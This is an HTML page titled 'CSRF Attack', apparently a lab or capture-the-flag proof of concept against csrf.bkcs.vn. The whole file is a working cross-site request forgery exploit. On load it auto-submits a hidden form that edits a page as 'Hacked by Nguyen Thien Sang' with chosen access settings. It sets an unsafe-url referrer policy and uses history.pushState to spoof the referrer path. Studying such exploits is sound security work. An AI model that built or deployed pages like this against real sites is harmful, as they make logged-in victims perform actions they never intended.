<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">

    
    <meta name="referrer" content="unsafe-url">
    
    
    <title>CSRF Attack</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <script>history.pushState('', '', '/')</script>
    
    <form method="post" action="http://csrf.bkcs.vn/action/pages/edit">
        
        <!-- <button class="button-5" type="submit" role="button">Click here to chat</button> -->
        <!-- <br> -->
        
        <input type="hidden" name="title" value="Someone created this page, not me!!!">
        <br>
        <input type="hidden" name="description" value="Hacked by Nguyen Thien Sang">
        <br>
        <input type="hidden" name="tags" value="test_csrf">
        <br>
        <input type="hidden" name="access_id" value="2">
        <br>
        <input type="hidden" name="write_access_id" value="1">
        <br>
        <input type="hidden" name="parent_guid" value="0">
    </form>
    
    <script>
        history.pushState("", "", "?csrf.bkcs.vn")
        document.forms[0].submit();
    </script>
</body>
</html>
